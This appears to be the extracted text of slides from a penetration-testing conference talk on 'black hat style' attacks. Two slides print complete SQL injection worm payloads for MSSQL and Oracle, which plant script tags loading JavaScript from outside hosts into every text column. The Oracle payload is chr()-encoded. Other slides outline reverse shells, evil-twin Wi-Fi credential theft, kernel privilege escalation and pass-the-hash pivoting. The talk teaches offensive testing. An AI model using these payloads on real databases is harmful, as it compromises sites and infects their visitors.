  • 25. One-Click Attack!   SQL Injection Worms - MSSQL!   ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C LAR E T a b l e _ C u r s o r C U R S O R F O R select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtyp e='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table _Cursor FETCH NEXT FROM Table_Curs o r I NTO @T, @ C W H I LE ( @ @ F ETC H _ STATU S=0) BEGIN exec('update ['+@T+'] set [' +@C+']=rtrim(convert(varchar,['+@C+'])) +''<script src=http://www.fengnima.cn/k.j s></script>''')FETCH NEXT FROM Table_ Cursor INTO @T,@C END CLOSE Table_C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS %20NVARCHAR(4000));EXEC(@S);--
  • 26. One-Click Attack!   SQL Injection Worms - Oracle!   http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)|| chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)|| chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)|| chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)|| chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)|| chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)|| chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr (101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)|| chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr (82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr (72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
  • 31. One-Click Attack! Link to Malicious Website Reverse Shell to Attackers
  • 33. Evil-Twin Attack!   Karma + Metasploit = Karmetasploit !!   Rouge Access Point (Evil Twin): Steal usernames, passwords and information from public wireless hotspots   Why we don’t steal something evil like credit card (Pay to Play) ??
  • 38. Black Hat versus White Hat!   Thinking Outside of the Box   Thinking Inside the box   Know one piece of information   Assigned Limited block of IP and have to expand from there address   Compromise all system and   Unable to go beyond the scope Target Attack of approved list, Only touch xyz hosts, Don’t touch abc host.   All Methodologies was Integrate   Follow Pen-Test Methodologies; OSSTMM, NIST, ISSAF   Download Exploit from Milw0rm,   Manual Foot printing, No noisy Exploit with Core Impact, scan, Just Nmap and 0-Day CANVAS, Metasploit Attack   Oops, I cannot hack user.   Attack Layer 8 :Client-Side OWNage
  • 39. Using Black Hat styles to Compromise system   Pen-Tester Must “Thinking outside of the box”   Attack Layer 8 : More effective result   Pen-Test with Black Hat styles   Using Black Hat Mind   Email Address Enumeration   Social Networking (Maltego)   Social Engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc)   Information Gathering All subdomain   xyz.victim.com, abc.victim.com, 123.victim.com   Blind Test, Compromise all system and Target Attack
  • 40. Using Black Hat styles to Compromise system
  • 42. KiTra0d – Local Ring0 Kernel Exploit   MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack   Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)   Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)   Patch release MS10-015 on Feb 09 2010 Get The Hell Outta Here !!   0-day for 1 month. W00t ! W00t !
  • 43. KiTra0d – Local Ring0 Kernel Exploit
  • 44. Token Kidnapping – Elevate Privilege   Token - Web Cookies   On Windows XP / 2003 – Windows Service run as SYSTEM account   Compromise of a Service == Full System Compromise   On Windows Vista / 2008 - LocalService / NetworkService == System   Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)   Patch release MS09-012 on April 14 2009   0-day for 1 year. W00t ! W00t !!   Black hat Mind !!   Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
  • 45. Operation CloudBurst   Start Mission with Attack Layer 8   SPAM Mail / 1-Click Ownage   Reverse Shell to Attacker   KiTrap0D – The Message From Slave to God   0-Day Ring0 xpl, All Windows OS   Maintain Access   Pivot (Tunneling), Backdoor Position   Compromise All System and Domain Controller   Impersonate Token, Pass-The-Hash Attack
  • 46. Operation CloudBurst! Intranet Reverse Shell connection to Attacker Internet Attack Network – Passthehash, KiTrap0d XPL impersonate Token Pivot Network – Route Add
  • 47.
  • 48. If someone is still in the room.. Q&A! THANK YOU!